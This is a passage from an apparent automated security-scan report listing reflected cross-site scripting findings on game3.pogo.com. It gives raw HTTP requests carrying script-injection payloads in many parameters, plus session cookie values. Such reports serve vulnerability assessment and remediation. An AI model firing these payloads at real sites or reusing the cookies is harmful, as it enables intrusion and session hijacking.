GET /room/loading/init.jsp?site=pogo&scrn=k7240&rkey=scrabble-plscrabblesf357&anam=481a1"><script>alert(1)</script>576b5d6378a&apid=autoratedrules&rspt=11909&ahst=game3.pogo.com&ugifts=0&rhst=www.pogo.com&game=scrabble&auto=PlayNow HTTP/1.1 Host: game3.pogo.com Proxy-Connection: keep-alive Referer: http://www.pogo.com/games/scrabble?pageSection=free_home_hot_games1_pl_scrabble Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_sq=%5B%5BB%5D%5D; op600clubpogogum=a00200200a2719m0337lk0d3e; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_nr%3D1294536852604-New%7C1297128852604%3B
The value of the apid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9f60b"><script>alert(1)</script>03774fbd27d was submitted in the apid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /room/loading/init.jsp?site=pogo&scrn=k7240&rkey=scrabble-plscrabblesf357&anam=Temporary+Room+102&apid=9f60b"><script>alert(1)</script>03774fbd27d&rspt=11909&ahst=game3.pogo.com&ugifts=0&rhst=www.pogo.com&game=scrabble&auto=PlayNow HTTP/1.1 Host: game3.pogo.com Proxy-Connection: keep-alive Referer: http://www.pogo.com/games/scrabble?pageSection=free_home_hot_games1_pl_scrabble Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_sq=%5B%5BB%5D%5D; op600clubpogogum=a00200200a2719m0337lk0d3e; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_nr%3D1294536852604-New%7C1297128852604%3B
The value of the auto request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 36ecf"><script>alert(1)</script>379a9cf2e56 was submitted in the auto parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /room/loading/init.jsp?site=pogo&scrn=k7240&rkey=scrabble-plscrabblesf357&anam=Temporary+Room+102&apid=autoratedrules&rspt=11909&ahst=game3.pogo.com&ugifts=0&rhst=www.pogo.com&game=scrabble&auto=36ecf"><script>alert(1)</script>379a9cf2e56 HTTP/1.1 Host: game3.pogo.com Proxy-Connection: keep-alive Referer: http://www.pogo.com/games/scrabble?pageSection=free_home_hot_games1_pl_scrabble Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_sq=%5B%5BB%5D%5D; op600clubpogogum=a00200200a2719m0337lk0d3e; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_nr%3D1294536852604-New%7C1297128852604%3B
3.498. http://game3.pogo.com/room/loading/init.jsp [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://game3.pogo.com
Path: /room/loading/init.jsp
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8ea62</script><script>alert(1)</script>3760e1d6c18 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /room/loading/init.jsp?8ea62</script><script>alert(1)</script>3760e1d6c18=1 HTTP/1.1 Host: game3.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536855963-New%7C1297128855963%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.hp.ls.cfg=0; op600clubpogogum=a00200200a2719m0337lk0d3e;
3.499. http://game3.pogo.com/room/loading/init.jsp [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://game3.pogo.com
Path: /room/loading/init.jsp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fc140"><script>alert(1)</script>b2bbcc6ee94 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /room/loading/init.jsp?site=pogo&scrn=k7240&rkey=scrabble-plscrabblesf357&anam=Temporary+Room+102&apid=autoratedrules&rspt=11909&ahst=game3.pogo.com&ugifts=0&rhst=www.pogo.com&game=scrabble&auto=PlayNow&fc140"><script>alert(1)</script>b2bbcc6ee94=1 HTTP/1.1 Host: game3.pogo.com Proxy-Connection: keep-alive Referer: http://www.pogo.com/games/scrabble?pageSection=free_home_hot_games1_pl_scrabble Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_sq=%5B%5BB%5D%5D; op600clubpogogum=a00200200a2719m0337lk0d3e; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_nr%3D1294536852604-New%7C1297128852604%3B
The value of the rhst request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 38ea8"><script>alert(1)</script>611e5c167b was submitted in the rhst parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /room/loading/init.jsp?site=pogo&scrn=k7240&rkey=scrabble-plscrabblesf357&anam=Temporary+Room+102&apid=autoratedrules&rspt=11909&ahst=game3.pogo.com&ugifts=0&rhst=38ea8"><script>alert(1)</script>611e5c167b&game=scrabble&auto=PlayNow HTTP/1.1 Host: game3.pogo.com Proxy-Connection: keep-alive Referer: http://www.pogo.com/games/scrabble?pageSection=free_home_hot_games1_pl_scrabble Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_sq=%5B%5BB%5D%5D; op600clubpogogum=a00200200a2719m0337lk0d3e; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_nr%3D1294536852604-New%7C1297128852604%3B
The value of the rspt request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cfa77"><script>alert(1)</script>6d9ec8f62ed was submitted in the rspt parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /room/loading/init.jsp?site=pogo&scrn=k7240&rkey=scrabble-plscrabblesf357&anam=Temporary+Room+102&apid=autoratedrules&rspt=cfa77"><script>alert(1)</script>6d9ec8f62ed&ahst=game3.pogo.com&ugifts=0&rhst=www.pogo.com&game=scrabble&auto=PlayNow HTTP/1.1 Host: game3.pogo.com Proxy-Connection: keep-alive Referer: http://www.pogo.com/games/scrabble?pageSection=free_home_hot_games1_pl_scrabble Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_sq=%5B%5BB%5D%5D; op600clubpogogum=a00200200a2719m0337lk0d3e; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_nr%3D1294536852604-New%7C1297128852604%3B
The value of the scrn request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b1fca"><script>alert(1)</script>aa742097ac6 was submitted in the scrn parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /room/loading/init.jsp?site=pogo&scrn=b1fca"><script>alert(1)</script>aa742097ac6&rkey=scrabble-plscrabblesf357&anam=Temporary+Room+102&apid=autoratedrules&rspt=11909&ahst=game3.pogo.com&ugifts=0&rhst=www.pogo.com&game=scrabble&auto=PlayNow HTTP/1.1 Host: game3.pogo.com Proxy-Connection: keep-alive Referer: http://www.pogo.com/games/scrabble?pageSection=free_home_hot_games1_pl_scrabble Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_sq=%5B%5BB%5D%5D; op600clubpogogum=a00200200a2719m0337lk0d3e; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_nr%3D1294536852604-New%7C1297128852604%3B
The value of the ugifts request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1eecd"><script>alert(1)</script>32bc7416dcb was submitted in the ugifts parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /room/loading/init.jsp?site=pogo&scrn=k7240&rkey=scrabble-plscrabblesf357&anam=Temporary+Room+102&apid=autoratedrules&rspt=11909&ahst=game3.pogo.com&ugifts=1eecd"><script>alert(1)</script>32bc7416dcb&rhst=www.pogo.com&game=scrabble&auto=PlayNow HTTP/1.1 Host: game3.pogo.com Proxy-Connection: keep-alive Referer: http://www.pogo.com/games/scrabble?pageSection=free_home_hot_games1_pl_scrabble Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_sq=%5B%5BB%5D%5D; op600clubpogogum=a00200200a2719m0337lk0d3e; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_nr%3D1294536852604-New%7C1297128852604%3B
The value of the ahst request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6724c"><script>alert(1)</script>42c19f207ae was submitted in the ahst parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /room/loading/jvmtest.jsp?site=pogo&scrn=k7240&rkey=scrabble-plscrabblesf357&anam=Temporary+Room+102&apid=autoratedrules&rspt=11909&ahst=game3.pogo.com6724c"><script>alert(1)</script>42c19f207ae&ugifts=0&rhst=www.pogo.com&game=scrabble&auto=PlayNow HTTP/1.1 Host: game3.pogo.com Proxy-Connection: keep-alive Referer: http://game3.pogo.com/room/loading/init.jsp?site=pogo&scrn=k7240&rkey=scrabble-plscrabblesf357&anam=Temporary+Room+102&apid=autoratedrules&rspt=11909&ahst=game3.pogo.com&ugifts=0&rhst=www.pogo.com&game=scrabble&auto=PlayNow Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_sq=%5B%5BB%5D%5D; op600clubpogogum=a00200200a2719m0337lk0d3e; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_pers=%20s_nr%3D1294536855963-New%7C1297128855963%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B
The value of the anam request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4401e"><script>alert(1)</script>8b4c56b51c1 was submitted in the anam parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /room/loading/jvmtest.jsp?site=pogo&scrn=k7240&rkey=scrabble-plscrabblesf357&anam=Temporary+Room+1024401e"><script>alert(1)</script>8b4c56b51c1&apid=autoratedrules&rspt=11909&ahst=game3.pogo.com&ugifts=0&rhst=www.pogo.com&game=scrabble&auto=PlayNow HTTP/1.1 Host: game3.pogo.com Proxy-Connection: keep-alive Referer: http://game3.pogo.com/room/loading/init.jsp?site=pogo&scrn=k7240&rkey=scrabble-plscrabblesf357&anam=Temporary+Room+102&apid=autoratedrules&rspt=11909&ahst=game3.pogo.com&ugifts=0&rhst=www.pogo.com&game=scrabble&auto=PlayNow Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_sq=%5B%5BB%5D%5D; op600clubpogogum=a00200200a2719m0337lk0d3e; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_pers=%20s_nr%3D1294536855963-New%7C1297128855963%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B
The value of the apid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1e635"><script>alert(1)</script>005bf7ed2bc was submitted in the apid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /room/loading/jvmtest.jsp?site=pogo&scrn=k7240&rkey=scrabble-plscrabblesf357&anam=Temporary+Room+102&apid=autoratedrules1e635"><script>alert(1)</script>005bf7ed2bc&rspt=11909&ahst=game3.pogo.com&ugifts=0&rhst=www.pogo.com&game=scrabble&auto=PlayNow HTTP/1.1 Host: game3.pogo.com Proxy-Connection: keep-alive Referer: http://game3.pogo.com/room/loading/init.jsp?site=pogo&scrn=k7240&rkey=scrabble-plscrabblesf357&anam=Temporary+Room+102&apid=autoratedrules&rspt=11909&ahst=game3.pogo.com&ugifts=0&rhst=www.pogo.com&game=scrabble&auto=PlayNow Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_sq=%5B%5BB%5D%5D; op600clubpogogum=a00200200a2719m0337lk0d3e; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_pers=%20s_nr%3D1294536855963-New%7C1297128855963%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B
The value of the auto request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 67b03"><script>alert(1)</script>8edfae6e7ac was submitted in the auto parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /room/loading/jvmtest.jsp?site=pogo&scrn=k7240&rkey=scrabble-plscrabblesf357&anam=Temporary+Room+102&apid=autoratedrules&rspt=11909&ahst=game3.pogo.com&ugifts=0&rhst=www.pogo.com&game=scrabble&auto=PlayNow67b03"><script>alert(1)</script>8edfae6e7ac HTTP/1.1 Host: game3.pogo.com Proxy-Connection: keep-alive Referer: http://game3.pogo.com/room/loading/init.jsp?site=pogo&scrn=k7240&rkey=scrabble-plscrabblesf357&anam=Temporary+Room+102&apid=autoratedrules&rspt=11909&ahst=game3.pogo.com&ugifts=0&rhst=www.pogo.com&game=scrabble&auto=PlayNow Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_sq=%5B%5BB%5D%5D; op600clubpogogum=a00200200a2719m0337lk0d3e; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_pers=%20s_nr%3D1294536855963-New%7C1297128855963%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B
<script type="text/javascript"> function show(dest) { if (top.window.opener) { top.window.opener.location.replace(dest); top.window.close(); } else { top.window. ...[SNIP]... m/loading/loading.jsp?site=pogo&scrn=k7240&rkey=scrabble-plscrabblesf357&anam=Temporary+Room+102&apid=autoratedrules&rspt=11909&ahst=game3.pogo.com&ugifts=0&rhst=www.pogo.com&game=scrabble&auto=PlayNow67b03"><script>alert(1)</script>8edfae6e7ac"> ...[SNIP]...
3.508. http://game3.pogo.com/room/loading/jvmtest.jsp [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://game3.pogo.com
Path: /room/loading/jvmtest.jsp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e13d1"><script>alert(1)</script>a7b4af90121 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /room/loading/jvmtest.jsp?site=pogo&scrn=k7240&rkey=scrabble-plscrabblesf357&anam=Temporary+Room+102&apid=autoratedrules&rspt=11909&ahst=game3.pogo.com&ugifts=0&rhst=www.pogo.com&game=scrabble&auto=PlayNow&e13d1"><script>alert(1)</script>a7b4af90121=1 HTTP/1.1 Host: game3.pogo.com Proxy-Connection: keep-alive Referer: http://game3.pogo.com/room/loading/init.jsp?site=pogo&scrn=k7240&rkey=scrabble-plscrabblesf357&anam=Temporary+Room+102&apid=autoratedrules&rspt=11909&ahst=game3.pogo.com&ugifts=0&rhst=www.pogo.com&game=scrabble&auto=PlayNow Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_sq=%5B%5BB%5D%5D; op600clubpogogum=a00200200a2719m0337lk0d3e; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_pers=%20s_nr%3D1294536855963-New%7C1297128855963%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B
The value of the rhst request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9c459"><script>alert(1)</script>145a3e0d196 was submitted in the rhst parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /room/loading/jvmtest.jsp?site=pogo&scrn=k7240&rkey=scrabble-plscrabblesf357&anam=Temporary+Room+102&apid=autoratedrules&rspt=11909&ahst=game3.pogo.com&ugifts=0&rhst=www.pogo.com9c459"><script>alert(1)</script>145a3e0d196&game=scrabble&auto=PlayNow HTTP/1.1 Host: game3.pogo.com Proxy-Connection: keep-alive Referer: http://game3.pogo.com/room/loading/init.jsp?site=pogo&scrn=k7240&rkey=scrabble-plscrabblesf357&anam=Temporary+Room+102&apid=autoratedrules&rspt=11909&ahst=game3.pogo.com&ugifts=0&rhst=www.pogo.com&game=scrabble&auto=PlayNow Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_sq=%5B%5BB%5D%5D; op600clubpogogum=a00200200a2719m0337lk0d3e; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_pers=%20s_nr%3D1294536855963-New%7C1297128855963%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B
The value of the rspt request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d8e12"><script>alert(1)</script>5e44d514793 was submitted in the rspt parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /room/loading/jvmtest.jsp?site=pogo&scrn=k7240&rkey=scrabble-plscrabblesf357&anam=Temporary+Room+102&apid=autoratedrules&rspt=11909d8e12"><script>alert(1)</script>5e44d514793&ahst=game3.pogo.com&ugifts=0&rhst=www.pogo.com&game=scrabble&auto=PlayNow HTTP/1.1 Host: game3.pogo.com Proxy-Connection: keep-alive Referer: http://game3.pogo.com/room/loading/init.jsp?site=pogo&scrn=k7240&rkey=scrabble-plscrabblesf357&anam=Temporary+Room+102&apid=autoratedrules&rspt=11909&ahst=game3.pogo.com&ugifts=0&rhst=www.pogo.com&game=scrabble&auto=PlayNow Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_sq=%5B%5BB%5D%5D; op600clubpogogum=a00200200a2719m0337lk0d3e; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_pers=%20s_nr%3D1294536855963-New%7C1297128855963%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B
The value of the scrn request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 68fd3"><script>alert(1)</script>cca616bfa9d was submitted in the scrn parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /room/loading/jvmtest.jsp?site=pogo&scrn=k724068fd3"><script>alert(1)</script>cca616bfa9d&rkey=scrabble-plscrabblesf357&anam=Temporary+Room+102&apid=autoratedrules&rspt=11909&ahst=game3.pogo.com&ugifts=0&rhst=www.pogo.com&game=scrabble&auto=PlayNow HTTP/1.1 Host: game3.pogo.com Proxy-Connection: keep-alive Referer: http://game3.pogo.com/room/loading/init.jsp?site=pogo&scrn=k7240&rkey=scrabble-plscrabblesf357&anam=Temporary+Room+102&apid=autoratedrules&rspt=11909&ahst=game3.pogo.com&ugifts=0&rhst=www.pogo.com&game=scrabble&auto=PlayNow Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_sq=%5B%5BB%5D%5D; op600clubpogogum=a00200200a2719m0337lk0d3e; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_pers=%20s_nr%3D1294536855963-New%7C1297128855963%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B
The value of the ugifts request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 75c99"><script>alert(1)</script>43258050f9e was submitted in the ugifts parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
